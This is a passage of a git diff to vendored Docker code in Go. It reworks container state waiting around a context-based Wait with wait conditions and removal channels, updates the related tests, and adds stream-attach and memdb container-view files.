 	Running           bool
 	Paused            bool
 	Restarting        bool
@@ -26,43 +28,40 @@ type State struct {
 	Dead              bool
 	Pid               int
 	ExitCodeValue     int    `json:"ExitCode"`
-	ErrorMsg          string `json:"Error"` // contains last known error when starting the container
+	ErrorMsg          string `json:"Error"` // contains last known error during container start, stop, or remove
 	StartedAt         time.Time
 	FinishedAt        time.Time
-	waitChan          chan struct{}
 	Health            *Health
+
+	waitStop   chan struct{}
+	waitRemove chan struct{}
 }
 
-// StateStatus is used to return an error type implementing both
-// exec.ExitCode and error.
+// StateStatus is used to return container wait results.
+// Implements exec.ExitCode interface.
 // This type is needed as State include a sync.Mutex field which make
 // copying it unsafe.
 type StateStatus struct {
 	exitCode int
-	error    string
-}
-
-func newStateStatus(ec int, err string) *StateStatus {
-	return &StateStatus{
-		exitCode: ec,
-		error:    err,
-	}
+	err      error
 }
 
 // ExitCode returns current exitcode for the state.
-func (ss *StateStatus) ExitCode() int {
-	return ss.exitCode
+func (s StateStatus) ExitCode() int {
+	return s.exitCode
 }
 
-// Error returns current error for the state.
-func (ss *StateStatus) Error() string {
-	return ss.error
+// Err returns current error for the state. Returns nil if the container had
+// exited on its own.
+func (s StateStatus) Err() error {
+	return s.err
 }
 
 // NewState creates a default state object with a fresh channel for state changes.
 func NewState() *State {
 	return &State{
-		waitChan: make(chan struct{}),
+		waitStop:   make(chan struct{}),
+		waitRemove: make(chan struct{}),
 	}
 }
 
@@ -102,15 +101,6 @@ func (s *State) String() string {
 	return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt)))
 }
 
-// HealthString returns a single string to describe health status.
-func (s *State) HealthString() string {
-	if s.Health == nil {
-		return types.NoHealthcheck
-	}
-
-	return s.Health.String()
-}
-
 // IsValidHealthString checks if the provided string is a valid container health status or not.
 func IsValidHealthString(s string) bool {
 	return s == types.Starting ||
@@ -160,66 +150,89 @@ func IsValidStateString(s string) bool {
 	return true
 }
 
-func wait(waitChan <-chan struct{}, timeout time.Duration) error {
-	if timeout < 0 {
-		<-waitChan
-		return nil
-	}
-	select {
-	case <-time.After(timeout):
-		return fmt.Errorf("Timed out: %v", timeout)
-	case <-waitChan:
-		return nil
-	}
-}
+// WaitCondition is an enum type for different states to wait for.
+type WaitCondition int
+
+// Possible WaitCondition Values.
+//
+// WaitConditionNotRunning (default) is used to wait for any of the non-running
+// states: "created", "exited", "dead", "removing", or "removed".
+//
+// WaitConditionNextExit is used to wait for the next time the state changes
+// to a non-running state. If the state is currently "created" or "exited",
+// this would cause Wait() to block until either the container runs and exits
+// or is removed.
+//
+// WaitConditionRemoved is used to wait for the container to be removed.
+const (
+	WaitConditionNotRunning WaitCondition = iota
+	WaitConditionNextExit
+	WaitConditionRemoved
+)
 
-// WaitStop waits until state is stopped. If state already stopped it returns
-// immediately. If you want wait forever you must supply negative timeout.
-// Returns exit code, that was passed to SetStopped
-func (s *State) WaitStop(timeout time.Duration) (int, error) {
-	s.Lock()
-	if !s.Running {
-		exitCode := s.ExitCodeValue
-		s.Unlock()
-		return exitCode, nil
-	}
-	waitChan := s.waitChan
-	s.Unlock()
-	if err := wait(waitChan, timeout); err != nil {
-		return -1, err
-	}
+// Wait waits until the container is in a certain state indicated by the given
+// condition. A context must be used for cancelling the request, controlling
+// timeouts, and avoiding goroutine leaks. Wait must be called without holding
+// the state lock. Returns a channel from which the caller will receive the
+// result. If the container exited on its own, the result's Err() method will
+// be nil and its ExitCode() method will return the container's exit code,
+// otherwise, the results Err() method will return an error indicating why the
+// wait operation failed.
+func (s *State) Wait(ctx context.Context, condition WaitCondition) <-chan StateStatus {
 	s.Lock()
 	defer s.Unlock()
-	return s.ExitCode(), nil
-}
 
-// WaitWithContext waits for the container to stop. Optional context can be
-// passed for canceling the request.
-func (s *State) WaitWithContext(ctx context.Context) error {
-	// todo(tonistiigi): make other wait functions use this
-	s.Lock()
-	if !s.Running {
-		state := newStateStatus(s.ExitCode(), s.Error())
-		defer s.Unlock()
-		if state.ExitCode() == 0 {
-			return nil
+	if condition == WaitConditionNotRunning && !s.Running {
+		// Buffer so we can put it in the channel now.
+		resultC := make(chan StateStatus, 1)
+
+		// Send the current status.
+		resultC <- StateStatus{
+			exitCode: s.ExitCode(),
+			err:      s.Err(),
 		}
-		return state
+
+		return resultC
 	}
-	waitChan := s.waitChan
-	s.Unlock()
-	select {
-	case <-waitChan:
+
+	// If we are waiting only for removal, the waitStop channel should
+	// remain nil and block forever.
+	var waitStop chan struct{}
+	if condition < WaitConditionRemoved {
+		waitStop = s.waitStop
+	}
+
+	// Always wait for removal, just in case the container gets removed
+	// while it is still in a "created" state, in which case it is never
+	// actually stopped.
+	waitRemove := s.waitRemove
+
+	resultC := make(chan StateStatus)
+
+	go func() {
+		select {
+		case <-ctx.Done():
+			// Context timeout or cancellation.
+			resultC <- StateStatus{
+				exitCode: -1,
+				err:      ctx.Err(),
+			}
+			return
+		case <-waitStop:
+		case <-waitRemove:
+		}
+
 		s.Lock()
-		state := newStateStatus(s.ExitCode(), s.Error())
-		s.Unlock()
-		if state.ExitCode() == 0 {
-			return nil
+		result := StateStatus{
+			exitCode: s.ExitCode(),
+			err:      s.Err(),
 		}
-		return state
-	case <-ctx.Done():
-		return ctx.Err()
-	}
+		s.Unlock()
+
+		resultC <- result
+	}()
+
+	return resultC
 }
 
 // IsRunning returns whether the running flag is set. Used by Container to check whether a container is running.
@@ -253,8 +266,12 @@ func (s *State) SetExitCode(ec int) {
 // SetRunning sets the state of the container to "running".
 func (s *State) SetRunning(pid int, initial bool) {
 	s.ErrorMsg = ""
+	s.Paused = false
 	s.Running = true
 	s.Restarting = false
+	if initial {
+		s.Paused = false
+	}
 	s.ExitCodeValue = 0
 	s.Pid = pid
 	if initial {
@@ -268,10 +285,15 @@ func (s *State) SetStopped(exitStatus *ExitStatus) {
 	s.Paused = false
 	s.Restarting = false
 	s.Pid = 0
-	s.FinishedAt = time.Now().UTC()
-	s.setFromExitStatus(exitStatus)
-	close(s.waitChan) // fire waiters for stop
-	s.waitChan = make(chan struct{})
+	if exitStatus.ExitedAt.IsZero() {
+		s.FinishedAt = time.Now().UTC()
+	} else {
+		s.FinishedAt = exitStatus.ExitedAt
+	}
+	s.ExitCodeValue = exitStatus.ExitCode
+	s.OOMKilled = exitStatus.OOMKilled
+	close(s.waitStop) // fire waiters for stop
+	s.waitStop = make(chan struct{})
 }
 
 // SetRestarting sets the container state to "restarting" without locking.
@@ -281,18 +303,23 @@ func (s *State) SetRestarting(exitStatus *ExitStatus) {
 	// all the checks in docker around rm/stop/etc
 	s.Running = true
 	s.Restarting = true
+	s.Paused = false
 	s.Pid = 0
 	s.FinishedAt = time.Now().UTC()
-	s.setFromExitStatus(exitStatus)
-	close(s.waitChan) // fire waiters for stop
-	s.waitChan = make(chan struct{})
+	s.ExitCodeValue = exitStatus.ExitCode
+	s.OOMKilled = exitStatus.OOMKilled
+	close(s.waitStop) // fire waiters for stop
+	s.waitStop = make(chan struct{})
 }
 
 // SetError sets the container's error state. This is useful when we want to
 // know the error that occurred when container transits to another state
 // when inspecting it
 func (s *State) SetError(err error) {
-	s.ErrorMsg = err.Error()
+	s.ErrorMsg = ""
+	if err != nil {
+		s.ErrorMsg = err.Error()
+	}
 }
 
 // IsPaused returns whether the container is paused or not.
@@ -330,6 +357,15 @@ func (s *State) ResetRemovalInProgress() {
 	s.Unlock()
 }
 
+// IsRemovalInProgress returns whether the RemovalInProgress flag is set.
+// Used by Container to check whether a container is being removed.
+func (s *State) IsRemovalInProgress() bool {
+	s.Lock()
+	res := s.RemovalInProgress
+	s.Unlock()
+	return res
+}
+
 // SetDead sets the container state to "dead"
 func (s *State) SetDead() {
 	s.Lock()
@@ -337,7 +373,37 @@ func (s *State) SetDead() {
 	s.Unlock()
 }
 
-// Error returns current error for the state.
-func (s *State) Error() string {
-	return s.ErrorMsg
+// IsDead returns whether the Dead flag is set. Used by Container to check whether a container is dead.
+func (s *State) IsDead() bool {
+	s.Lock()
+	res := s.Dead
+	s.Unlock()
+	return res
+}
+
+// SetRemoved assumes this container is already in the "dead" state and
+// closes the internal waitRemove channel to unblock callers waiting for a
+// container to be removed.
+func (s *State) SetRemoved() {
+	s.SetRemovalError(nil)
+}
+
+// SetRemovalError is to be called in case a container remove failed.
+// It sets an error and closes the internal waitRemove channel to unblock
+// callers waiting for the container to be removed.
+func (s *State) SetRemovalError(err error) {
+	s.SetError(err)
+	s.Lock()
+	close(s.waitRemove) // Unblock those waiting on remove.
+	// Recreate the channel so next ContainerWait will work
+	s.waitRemove = make(chan struct{})
+	s.Unlock()
+}
+
+// Err returns an error if there is one.
+func (s *State) Err() error {
+	if s.ErrorMsg != "" {
+		return errors.New(s.ErrorMsg)
+	}
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/container/state_solaris.go b/vendor/github.com/docker/docker/container/state_solaris.go
deleted file mode 100644
index 1229650efa..0000000000
--- a/vendor/github.com/docker/docker/container/state_solaris.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package container
-
-// setFromExitStatus is a platform specific helper function to set the state
-// based on the ExitStatus structure.
-func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
-	s.ExitCodeValue = exitStatus.ExitCode
-}
diff --git a/vendor/github.com/docker/docker/container/state_test.go b/vendor/github.com/docker/docker/container/state_test.go
index c9a7bb4b7b..4ad3c805ed 100644
--- a/vendor/github.com/docker/docker/container/state_test.go
+++ b/vendor/github.com/docker/docker/container/state_test.go
@@ -1,7 +1,7 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
-	"sync/atomic"
+	"context"
 	"testing"
 	"time"
 
@@ -30,31 +30,63 @@ func TestIsValidHealthString(t *testing.T) {
 
 func TestStateRunStop(t *testing.T) {
 	s := NewState()
-	for i := 1; i < 3; i++ { // full lifecycle two times
+
+	// Begin another wait with WaitConditionRemoved. It should complete
+	// within 200 milliseconds.
+	ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond)
+	defer cancel()
+	removalWait := s.Wait(ctx, WaitConditionRemoved)
+
+	// Full lifecycle two times.
+	for i := 1; i <= 2; i++ {
+		// A wait with WaitConditionNotRunning should return
+		// immediately since the state is now either "created" (on the
+		// first iteration) or "exited" (on the second iteration). It
+		// shouldn't take more than 50 milliseconds.
+		ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond)
+		defer cancel()
+		// Expectx exit code to be i-1 since it should be the exit
+		// code from the previous loop or 0 for the created state.
+		if status := <-s.Wait(ctx, WaitConditionNotRunning); status.ExitCode() != i-1 {
+			t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i-1, status.Err())
+		}
+
+		// A wait with WaitConditionNextExit should block until the
+		// container has started and exited. It shouldn't take more
+		// than 100 milliseconds.
+		ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond)
+		defer cancel()
+		initialWait := s.Wait(ctx, WaitConditionNextExit)
+
+		// Set the state to "Running".
 		s.Lock()
-		s.SetRunning(i+100, false)
+		s.SetRunning(i, true)
 		s.Unlock()
 
+		// Assert desired state.
 		if !s.IsRunning() {
 			t.Fatal("State not running")
 		}
-		if s.Pid != i+100 {
-			t.Fatalf("Pid %v, expected %v", s.Pid, i+100)
+		if s.Pid != i {
+			t.Fatalf("Pid %v, expected %v", s.Pid, i)
 		}
 		if s.ExitCode() != 0 {
 			t.Fatalf("ExitCode %v, expected 0", s.ExitCode())
 		}
 
-		stopped := make(chan struct{})
-		var exit int64
-		go func() {
-			exitCode, _ := s.WaitStop(-1 * time.Second)
-			atomic.StoreInt64(&exit, int64(exitCode))
-			close(stopped)
-		}()
+		// Now that it's running, a wait with WaitConditionNotRunning
+		// should block until we stop the container. It shouldn't take
+		// more than 100 milliseconds.
+		ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond)
+		defer cancel()
+		exitWait := s.Wait(ctx, WaitConditionNotRunning)
+
+		// Set the state to "Exited".
 		s.Lock()
 		s.SetStopped(&ExitStatus{ExitCode: i})
 		s.Unlock()
+
+		// Assert desired state.
 		if s.IsRunning() {
 			t.Fatal("State is running")
 		}
@@ -64,50 +96,97 @@ func TestStateRunStop(t *testing.T) {
 		if s.Pid != 0 {
 			t.Fatalf("Pid %v, expected 0", s.Pid)
 		}
-		select {
-		case <-time.After(100 * time.Millisecond):
-			t.Fatal("Stop callback doesn't fire in 100 milliseconds")
-		case <-stopped:
-			t.Log("Stop callback fired")
-		}
-		exitCode := int(atomic.LoadInt64(&exit))
-		if exitCode != i {
-			t.Fatalf("ExitCode %v, expected %v", exitCode, i)
+
+		// Receive the initialWait result.
+		if status := <-initialWait; status.ExitCode() != i {
+			t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err())
 		}
-		if exitCode, err := s.WaitStop(-1 * time.Second); err != nil || exitCode != i {
-			t.Fatalf("WaitStop returned exitCode: %v, err: %v, expected exitCode: %v, err: %v", exitCode, err, i, nil)
+
+		// Receive the exitWait result.
+		if status := <-exitWait; status.ExitCode() != i {
+			t.Fatalf("ExitCode %v, expected %v, err %q", status.ExitCode(), i, status.Err())
 		}
 	}
+
+	// Set the state to dead and removed.
+	s.SetDead()
+	s.SetRemoved()
+
+	// Wait for removed status or timeout.
+	if status := <-removalWait; status.ExitCode() != 2 {
+		// Should have the final exit code from the loop.
+		t.Fatalf("Removal wait exitCode %v, expected %v, err %q", status.ExitCode(), 2, status.Err())
+	}
 }
 
 func TestStateTimeoutWait(t *testing.T) {
 	s := NewState()
-	stopped := make(chan struct{})
-	go func() {
-		s.WaitStop(100 * time.Millisecond)
-		close(stopped)
-	}()
+
+	s.Lock()
+	s.SetRunning(0, true)
+	s.Unlock()
+
+	// Start a wait with a timeout.
+	ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond)
+	defer cancel()
+	waitC := s.Wait(ctx, WaitConditionNotRunning)
+
+	// It should timeout *before* this 200ms timer does.
 	select {
 	case <-time.After(200 * time.Millisecond):
 		t.Fatal("Stop callback doesn't fire in 200 milliseconds")
-	case <-stopped:
+	case status := <-waitC:
 		t.Log("Stop callback fired")
+		// Should be a timeout error.
+		if status.Err() == nil {
+			t.Fatal("expected timeout error, got nil")
+		}
+		if status.ExitCode() != -1 {
+			t.Fatalf("expected exit code %v, got %v", -1, status.ExitCode())
+		}
 	}
 
 	s.Lock()
-	s.SetStopped(&ExitStatus{ExitCode: 1})
+	s.SetStopped(&ExitStatus{ExitCode: 0})
 	s.Unlock()
 
-	stopped = make(chan struct{})
-	go func() {
-		s.WaitStop(100 * time.Millisecond)
-		close(stopped)
-	}()
+	// Start another wait with a timeout. This one should return
+	// immediately.
+	ctx, cancel = context.WithTimeout(context.Background(), 100*time.Millisecond)
+	defer cancel()
+	waitC = s.Wait(ctx, WaitConditionNotRunning)
+
 	select {
 	case <-time.After(200 * time.Millisecond):
-		t.Fatal("Stop callback doesn't fire in 100 milliseconds")
-	case <-stopped:
+		t.Fatal("Stop callback doesn't fire in 200 milliseconds")
+	case status := <-waitC:
 		t.Log("Stop callback fired")
+		if status.ExitCode() != 0 {
+			t.Fatalf("expected exit code %v, got %v, err %q", 0, status.ExitCode(), status.Err())
+		}
 	}
+}
 
+func TestIsValidStateString(t *testing.T) {
+	states := []struct {
+		state    string
+		expected bool
+	}{
+		{"paused", true},
+		{"restarting", true},
+		{"running", true},
+		{"dead", true},
+		{"start", false},
+		{"created", true},
+		{"exited", true},
+		{"removing", true},
+		{"stop", false},
+	}
+
+	for _, s := range states {
+		v := IsValidStateString(s.state)
+		if v != s.expected {
+			t.Fatalf("Expected %t, but got %t", s.expected, v)
+		}
+	}
 }
diff --git a/vendor/github.com/docker/docker/container/state_unix.go b/vendor/github.com/docker/docker/container/state_unix.go
deleted file mode 100644
index a2fa5afc28..0000000000
--- a/vendor/github.com/docker/docker/container/state_unix.go
+++ /dev/null
@@ -1,10 +0,0 @@
-// +build linux freebsd
-
-package container
-
-// setFromExitStatus is a platform specific helper function to set the state
-// based on the ExitStatus structure.
-func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
-	s.ExitCodeValue = exitStatus.ExitCode
-	s.OOMKilled = exitStatus.OOMKilled
-}
diff --git a/vendor/github.com/docker/docker/container/state_windows.go b/vendor/github.com/docker/docker/container/state_windows.go
deleted file mode 100644
index 1229650efa..0000000000
--- a/vendor/github.com/docker/docker/container/state_windows.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package container
-
-// setFromExitStatus is a platform specific helper function to set the state
-// based on the ExitStatus structure.
-func (s *State) setFromExitStatus(exitStatus *ExitStatus) {
-	s.ExitCodeValue = exitStatus.ExitCode
-}
diff --git a/vendor/github.com/docker/docker/container/store.go b/vendor/github.com/docker/docker/container/store.go
index 042fb1a349..3af0389856 100644
--- a/vendor/github.com/docker/docker/container/store.go
+++ b/vendor/github.com/docker/docker/container/store.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 // StoreFilter defines a function to filter
 // container in the store.
diff --git a/vendor/github.com/docker/docker/container/stream/attach.go b/vendor/github.com/docker/docker/container/stream/attach.go
new file mode 100644
index 0000000000..1366dcb499
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/stream/attach.go
@@ -0,0 +1,175 @@
+package stream // import "github.com/docker/docker/container/stream"
+
+import (
+	"context"
+	"io"
+
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/term"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sync/errgroup"
+)
+
+var defaultEscapeSequence = []byte{16, 17} // ctrl-p, ctrl-q
+
+// AttachConfig is the config struct used to attach a client to a stream's stdio
+type AttachConfig struct {
+	// Tells the attach copier that the stream's stdin is a TTY and to look for
+	// escape sequences in stdin to detach from the stream.
+	// When true the escape sequence is not passed to the underlying stream
+	TTY bool
+	// Specifies the detach keys the client will be using
+	// Only useful when `TTY` is true
+	DetachKeys []byte
+
+	// CloseStdin signals that once done, stdin for the attached stream should be closed
+	// For example, this would close the attached container's stdin.
+	CloseStdin bool
+
+	// UseStd* indicate whether the client has requested to be connected to the
+	// given stream or not.  These flags are used instead of checking Std* != nil
+	// at points before the client streams Std* are wired up.
+	UseStdin, UseStdout, UseStderr bool
+
+	// CStd* are the streams directly connected to the container
+	CStdin           io.WriteCloser
+	CStdout, CStderr io.ReadCloser
+
+	// Provide client streams to wire up to
+	Stdin          io.ReadCloser
+	Stdout, Stderr io.Writer
+}
+
+// AttachStreams attaches the container's streams to the AttachConfig
+func (c *Config) AttachStreams(cfg *AttachConfig) {
+	if cfg.UseStdin {
+		cfg.CStdin = c.StdinPipe()
+	}
+
+	if cfg.UseStdout {
+		cfg.CStdout = c.StdoutPipe()
+	}
+
+	if cfg.UseStderr {
+		cfg.CStderr = c.StderrPipe()
+	}
+}
+
+// CopyStreams starts goroutines to copy data in and out to/from the container
+func (c *Config) CopyStreams(ctx context.Context, cfg *AttachConfig) <-chan error {
+	var group errgroup.Group
+
+	// Connect stdin of container to the attach stdin stream.
+	if cfg.Stdin != nil {
+		group.Go(func() error {
+			logrus.Debug("attach: stdin: begin")
+			defer logrus.Debug("attach: stdin: end")
+
+			defer func() {
+				if cfg.CloseStdin && !cfg.TTY {
+					cfg.CStdin.Close()
+				} else {
+					// No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr
+					if cfg.CStdout != nil {
+						cfg.CStdout.Close()
+					}
+					if cfg.CStderr != nil {
+						cfg.CStderr.Close()
+					}
+				}
+			}()
+
+			var err error
+			if cfg.TTY {
+				_, err = copyEscapable(cfg.CStdin, cfg.Stdin, cfg.DetachKeys)
+			} else {
+				_, err = pools.Copy(cfg.CStdin, cfg.Stdin)
+			}
+			if err == io.ErrClosedPipe {
+				err = nil
+			}
+			if err != nil {
+				logrus.WithError(err).Debug("error on attach stdin")
+				return errors.Wrap(err, "error on attach stdin")
+			}
+			return nil
+		})
+	}
+
+	attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) error {
+		logrus.Debugf("attach: %s: begin", name)
+		defer logrus.Debugf("attach: %s: end", name)
+		defer func() {
+			// Make sure stdin gets closed
+			if cfg.Stdin != nil {
+				cfg.Stdin.Close()
+			}
+			streamPipe.Close()
+		}()
+
+		_, err := pools.Copy(stream, streamPipe)
+		if err == io.ErrClosedPipe {
+			err = nil
+		}
+		if err != nil {
+			logrus.WithError(err).Debugf("attach: %s", name)
+			return errors.Wrapf(err, "error attaching %s stream", name)
+		}
+		return nil
+	}
+
+	if cfg.Stdout != nil {
+		group.Go(func() error {
+			return attachStream("stdout", cfg.Stdout, cfg.CStdout)
+		})
+	}
+	if cfg.Stderr != nil {
+		group.Go(func() error {
+			return attachStream("stderr", cfg.Stderr, cfg.CStderr)
+		})
+	}
+
+	errs := make(chan error, 1)
+	go func() {
+		defer logrus.Debug("attach done")
+		groupErr := make(chan error, 1)
+		go func() {
+			groupErr <- group.Wait()
+		}()
+		select {
+		case <-ctx.Done():
+			// close all pipes
+			if cfg.CStdin != nil {
+				cfg.CStdin.Close()
+			}
+			if cfg.CStdout != nil {
+				cfg.CStdout.Close()
+			}
+			if cfg.CStderr != nil {
+				cfg.CStderr.Close()
+			}
+
+			// Now with these closed, wait should return.
+			if err := group.Wait(); err != nil {
+				errs <- err
+				return
+			}
+			errs <- ctx.Err()
+		case err := <-groupErr:
+			errs <- err
+		}
+	}()
+
+	return errs
+}
+
+func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) {
+	if len(keys) == 0 {
+		keys = defaultEscapeSequence
+	}
+	pr := term.NewEscapeProxy(src, keys)
+	defer src.Close()
+
+	return pools.Copy(dst, pr)
+}
diff --git a/vendor/github.com/docker/docker/container/stream/streams.go b/vendor/github.com/docker/docker/container/stream/streams.go
index 79f366afda..d81867c1da 100644
--- a/vendor/github.com/docker/docker/container/stream/streams.go
+++ b/vendor/github.com/docker/docker/container/stream/streams.go
@@ -1,4 +1,4 @@
-package stream
+package stream // import "github.com/docker/docker/container/stream"
 
 import (
 	"fmt"
@@ -7,11 +7,11 @@ import (
 	"strings"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/containerd/containerd/cio"
 	"github.com/docker/docker/pkg/broadcaster"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/pools"
+	"github.com/sirupsen/logrus"
 )
 
 // Config holds information about I/O streams managed together.
@@ -62,6 +62,7 @@ func (c *Config) StdinPipe() io.WriteCloser {
 
 // StdoutPipe creates a new io.ReadCloser with an empty bytes pipe.
 // It adds this new out pipe to the Stdout broadcaster.
+// This will block stdout if unconsumed.
 func (c *Config) StdoutPipe() io.ReadCloser {
 	bytesPipe := ioutils.NewBytesPipe()
 	c.stdout.Add(bytesPipe)
@@ -70,6 +71,7 @@ func (c *Config) StdoutPipe() io.ReadCloser {
 
 // StderrPipe creates a new io.ReadCloser with an empty bytes pipe.
 // It adds this new err pipe to the Stderr broadcaster.
+// This will block stderr if unconsumed.
 func (c *Config) StderrPipe() io.ReadCloser {
 	bytesPipe := ioutils.NewBytesPipe()
 	c.stderr.Add(bytesPipe)
@@ -112,13 +114,14 @@ func (c *Config) CloseStreams() error {
 }
 
 // CopyToPipe connects streamconfig with a libcontainerd.IOPipe
-func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) {
-	copyFunc := func(w io.Writer, r io.Reader) {
+func (c *Config) CopyToPipe(iop *cio.DirectIO) {
+	copyFunc := func(w io.Writer, r io.ReadCloser) {
 		c.Add(1)
 		go func() {
 			if _, err := pools.Copy(w, r); err != nil {
-				logrus.Errorf("stream copy error: %+v", err)
+				logrus.Errorf("stream copy error: %v", err)
 			}
+			r.Close()
 			c.Done()
 		}()
 	}
@@ -135,7 +138,7 @@ func (c *Config) CopyToPipe(iop libcontainerd.IOPipe) {
 			go func() {
 				pools.Copy(iop.Stdin, stdin)
 				if err := iop.Stdin.Close(); err != nil {
-					logrus.Warnf("failed to close stdin: %+v", err)
+					logrus.Warnf("failed to close stdin: %v", err)
 				}
 			}()
 		}
diff --git a/vendor/github.com/docker/docker/container/view.go b/vendor/github.com/docker/docker/container/view.go
new file mode 100644
index 0000000000..b631499412
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/view.go
@@ -0,0 +1,494 @@
+package container // import "github.com/docker/docker/container"
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/go-connections/nat"
+	"github.com/hashicorp/go-memdb"
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	memdbContainersTable  = "containers"
+	memdbNamesTable       = "names"
+	memdbIDIndex          = "id"
+	memdbContainerIDIndex = "containerid"
+)
+
+var (
+	// ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved
+	ErrNameReserved = errors.New("name is reserved")
+	// ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved
+	ErrNameNotReserved = errors.New("name is not reserved")
+)
+
+// Snapshot is a read only view for Containers. It holds all information necessary to serve container queries in a
+// versioned ACID in-memory store.
+type Snapshot struct {
+	types.Container
+
+	// additional info queries need to filter on
+	// preserve nanosec resolution for queries
+	CreatedAt    time.Time
+	StartedAt    time.Time
+	Name         string
+	Pid          int
+	ExitCode     int
+	Running      bool
+	Paused       bool
+	Managed      bool
+	ExposedPorts nat.PortSet
+	PortBindings nat.PortSet
+	Health       string
+	HostConfig   struct {
+		Isolation string
+	}
+}
+
+// nameAssociation associates a container id with a name.
+type nameAssociation struct {
+	// name is the name to associate. Note that name is the primary key
+	// ("id" in memdb).
+	name        string
+	containerID string
+}
+
+// ViewDB provides an in-memory transactional (ACID) container Store
+type ViewDB interface {
+	Snapshot() View
+	Save(*Container) error
+	Delete(*Container) error
+
+	ReserveName(name, containerID string) error
+	ReleaseName(name string) error
+}
+
+// View can be used by readers to avoid locking
+type View interface {
+	All() ([]Snapshot, error)
+	Get(id string) (*Snapshot, error)
+
+	GetID(name string) (string, error)
+	GetAllNames() map[string][]string
+}
+
+var schema = &memdb.DBSchema{
+	Tables: map[string]*memdb.TableSchema{
+		memdbContainersTable: {
+			Name: memdbContainersTable,
+			Indexes: map[string]*memdb.IndexSchema{
+				memdbIDIndex: {
+					Name:    memdbIDIndex,
+					Unique:  true,
+					Indexer: &containerByIDIndexer{},
+				},
+			},
+		},
+		memdbNamesTable: {
+			Name: memdbNamesTable,
+			Indexes: map[string]*memdb.IndexSchema{
+				// Used for names, because "id" is the primary key in memdb.
+				memdbIDIndex: {
+					Name:    memdbIDIndex,
+					Unique:  true,
+					Indexer: &namesByNameIndexer{},
+				},
+				memdbContainerIDIndex: {
+					Name:    memdbContainerIDIndex,
+					Indexer: &namesByContainerIDIndexer{},
+				},
+			},
+		},
+	},
+}
+
+type memDB struct {
+	store *memdb.MemDB
+}
+
+// NoSuchContainerError indicates that the container wasn't found in the
+// database.
+type NoSuchContainerError struct {
+	id string
+}
+
+// Error satisfies the error interface.
+func (e NoSuchContainerError) Error() string {
+	return "no such container " + e.id
+}
+
+// NewViewDB provides the default implementation, with the default schema
+func NewViewDB() (ViewDB, error) {
+	store, err := memdb.NewMemDB(schema)
+	if err != nil {
+		return nil, err
+	}
+	return &memDB{store: store}, nil
+}
+
+// Snapshot provides a consistent read-only View of the database
+func (db *memDB) Snapshot() View {
+	return &memdbView{
+		txn: db.store.Txn(false),
+	}
+}
+
+func (db *memDB) withTxn(cb func(*memdb.Txn) error) error {
+	txn := db.store.Txn(true)
+	err := cb(txn)
+	if err != nil {
+		txn.Abort()
+		return err
+	}
+	txn.Commit()
+	return nil
+}
+
+// Save atomically updates the in-memory store state for a Container.
+// Only read only (deep) copies of containers may be passed in.
+func (db *memDB) Save(c *Container) error {
+	return db.withTxn(func(txn *memdb.Txn) error {
+		return txn.Insert(memdbContainersTable, c)
+	})
+}
+
+// Delete removes an item by ID
+func (db *memDB) Delete(c *Container) error {
+	return db.withTxn(func(txn *memdb.Txn) error {
+		view := &memdbView{txn: txn}
+		names := view.getNames(c.ID)
+
+		for _, name := range names {
+			txn.Delete(memdbNamesTable, nameAssociation{name: name})
+		}
+
+		// Ignore error - the container may not actually exist in the
+		// db, but we still need to clean up associated names.
+		txn.Delete(memdbContainersTable, NewBaseContainer(c.ID, c.Root))
+		return nil
+	})
+}
+
+// ReserveName registers a container ID to a name
+// ReserveName is idempotent
+// Attempting to reserve a container ID to a name that already exists results in an `ErrNameReserved`
+// A name reservation is globally unique
+func (db *memDB) ReserveName(name, containerID string) error {
+	return db.withTxn(func(txn *memdb.Txn) error {
+		s, err := txn.First(memdbNamesTable, memdbIDIndex, name)
+		if err != nil {
+			return err
+		}
+		if s != nil {
+			if s.(nameAssociation).containerID != containerID {
+				return ErrNameReserved
+			}
+			return nil
+		}
+		return txn.Insert(memdbNamesTable, nameAssociation{name: name, containerID: containerID})
+	})
+}
+
+// ReleaseName releases the reserved name
+// Once released, a name can be reserved again
+func (db *memDB) ReleaseName(name string) error {
+	return db.withTxn(func(txn *memdb.Txn) error {
+		return txn.Delete(memdbNamesTable, nameAssociation{name: name})
+	})
+}
+
+type memdbView struct {
+	txn *memdb.Txn
+}
+
+// All returns a all items in this snapshot. Returned objects must never be modified.
+func (v *memdbView) All() ([]Snapshot, error) {
+	var all []Snapshot
+	iter, err := v.txn.Get(memdbContainersTable, memdbIDIndex)
+	if err != nil {
+		return nil, err
+	}
+	for {
+		item := iter.Next()
+		if item == nil {
+			break
+		}
+		snapshot := v.transform(item.(*Container))
+		all = append(all, *snapshot)
+	}
+	return all, nil
+}
+
